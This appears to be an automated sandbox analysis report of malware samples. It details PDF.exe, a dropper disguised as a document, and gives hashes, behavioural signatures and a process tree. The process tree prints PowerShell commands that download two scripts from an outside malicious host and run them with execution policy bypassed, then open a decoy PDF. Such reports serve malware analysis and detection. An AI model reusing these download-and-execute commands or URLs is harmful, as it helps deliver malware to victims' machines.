Overview
overview
10Static
static
101PDF.Fatur...07.exe
windows7-x64
81PDF.Fatur...07.exe
windows10-2004-x64
83e6642f710...5e.exe
windows7-x64
103e6642f710...5e.exe
windows10-2004-x64
104c40337094...92.exe
windows7-x64
104c40337094...92.exe
windows10-2004-x64
10644d928a4a...25.exe
windows7-x64
10644d928a4a...25.exe
windows10-2004-x64
1064ec6562b9...2e.exe
windows7-x64
1064ec6562b9...2e.exe
windows10-2004-x64
107a0395c75a...8e.exe
windows7-x64
107a0395c75a...8e.exe
windows10-2004-x64
10901478668c...d4.exe
windows7-x64
10901478668c...d4.exe
windows10-2004-x64
10938b7e042b...98.exe
windows7-x64
10938b7e042b...98.exe
windows10-2004-x64
1096d1bc7dec...b7.exe
windows7-x64
1096d1bc7dec...b7.exe
windows10-2004-x64
10Built.exe
windows7-x64
7Built.exe
windows10-2004-x64
8DHL_PT5638...53.bat
windows7-x64
8DHL_PT5638...53.bat
windows10-2004-x64
8DTLite.exe
windows7-x64
10DTLite.exe
windows10-2004-x64
10PDF.Fatura...07.exe
windows7-x64
8PDF.Fatura...07.exe
windows10-2004-x64
8PDF.exe
windows7-x64
10PDF.exe
windows10-2004-x64
10SIP.03746.XSLSX.exe
windows7-x64
8SIP.03746.XSLSX.exe
windows10-2004-x64
8a33245a27c...8a.exe
windows7-x64
10a33245a27c...8a.exe
windows10-2004-x64
10Resubmissions
21-01-2025 11:18
250121-nef6aa1jfx 10Analysis
-
max time kernel
117s -
max time network
29s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 11:18
Behavioral task
behavioral1
Sample
1PDF.FaturaDetay_202407.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1PDF.FaturaDetay_202407.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
4c40337094cf0bb86fad86d2ea724ac6e6a499f0acd877839a69d35c354a7792.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
4c40337094cf0bb86fad86d2ea724ac6e6a499f0acd877839a69d35c354a7792.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
644d928a4a942f6ae4c90640103b595941f7a0b557ba49d122d137b1429c0325.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
644d928a4a942f6ae4c90640103b595941f7a0b557ba49d122d137b1429c0325.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
901478668c0d5ecb3b5044dcb3e1744045f7b2a800a7c0c67020d9294470f3d4.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
901478668c0d5ecb3b5044dcb3e1744045f7b2a800a7c0c67020d9294470f3d4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
938b7e042bda75e416261e46d0d4873781fd5d53c2ce6c2748b92eeb8a826598.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
938b7e042bda75e416261e46d0d4873781fd5d53c2ce6c2748b92eeb8a826598.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
96d1bc7dec91a7a4e5fe653853a504e07d17e898fa437cf75e929fa909dd6bb7.exe
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
96d1bc7dec91a7a4e5fe653853a504e07d17e898fa437cf75e929fa909dd6bb7.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
Built.exe
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
Built.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
DHL_PT563857935689275783656385FV-GDS3535353.bat
Resource
win7-20241010-en
Behavioral task
behavioral22
Sample
DHL_PT563857935689275783656385FV-GDS3535353.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
DTLite.exe
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
DTLite.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
PDF.FaturaDetay_202407.exe
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
PDF.FaturaDetay_202407.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
PDF.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
SIP.03746.XSLSX.exe
Resource
win7-20241010-en
Behavioral task
behavioral30
Sample
SIP.03746.XSLSX.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
a33245a27c02bbb72bf66f6bf1c960affefa8ed2a096dc1d6faa6699fe81c48a.exe
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
a33245a27c02bbb72bf66f6bf1c960affefa8ed2a096dc1d6faa6699fe81c48a.exe
Resource
win10v2004-20241007-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
pid Process 2356 powershell.exe 2760 powershell.exe 3024 powershell.exe 2856 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral27/files/0x000500000001a438-59.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2612 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3044 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2856 powershell.exe 3024 powershell.exe 2760 powershell.exe 2356 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3044 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3044 AcroRd32.exe 3044 AcroRd32.exe 3044 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1356 wrote to memory of 2804 1356 PDF.exe 29 PID 1356 wrote to memory of 2804 1356 PDF.exe 29 PID 1356 wrote to memory of 2804 1356 PDF.exe 29 PID 2804 wrote to memory of 2856 2804 cmd.exe 31 PID 2804 wrote to memory of 2856 2804 cmd.exe 31 PID 2804 wrote to memory of 2856 2804 cmd.exe 31 PID 2804 wrote to memory of 3024 2804 cmd.exe 32 PID 2804 wrote to memory of 3024 2804 cmd.exe 32 PID 2804 wrote to memory of 3024 2804 cmd.exe 32 PID 2804 wrote to memory of 2760 2804 cmd.exe 33 PID 2804 wrote to memory of 2760 2804 cmd.exe 33 PID 2804 wrote to memory of 2760 2804 cmd.exe 33 PID 2804 wrote to memory of 2356 2804 cmd.exe 34 PID 2804 wrote to memory of 2356 2804 cmd.exe 34 PID 2804 wrote to memory of 2356 2804 cmd.exe 34 PID 2804 wrote to memory of 2612 2804 cmd.exe 35 PID 2804 wrote to memory of 2612 2804 cmd.exe 35 PID 2804 wrote to memory of 2612 2804 cmd.exe 35 PID 2804 wrote to memory of 3044 2804 cmd.exe 36 PID 2804 wrote to memory of 3044 2804 cmd.exe 36 PID 2804 wrote to memory of 3044 2804 cmd.exe 36 PID 2804 wrote to memory of 3044 2804 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5AFC.tmp\5AFD.tmp\5AFE.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2612
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3044
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
3KB
MD5be82756be9387b7f75aac3b9fa9a2eaf
SHA116f10f57490232a1abc16195c6b1fbb923feb109
SHA25631a9e10203da50812ce613b10a61e35bfd3b06324e50870988fb4d8f6518c93e
SHA512d233525225567ef6b15c11fcc1d40976fd4e0cc7981079fd221ccd3cc4912ef75fb620647f094a504898eceb84d9a6d8f77f1d2107672e4758ccf8cb91142850
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WB91KCETTCGQMVJ1LZ52.temp
Filesize7KB
MD5e91ed2cc4d830dc651361f331ad6a3a4
SHA1effe3b9030fd817eee5e4f9fc537745bd1676294
SHA25674ba657c6912a79fc7064c3c510844e49cb384b12370ef0e8151ec035e60bb81
SHA512cda55e558af834cfa8391cb8dfd5d1d8ce7e0fb31611c1af59e5955505fbc9f04c20518f51f4ccccd18cb1fe571403b64c3ddb657a81a75bd3eb30650e5128e7
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288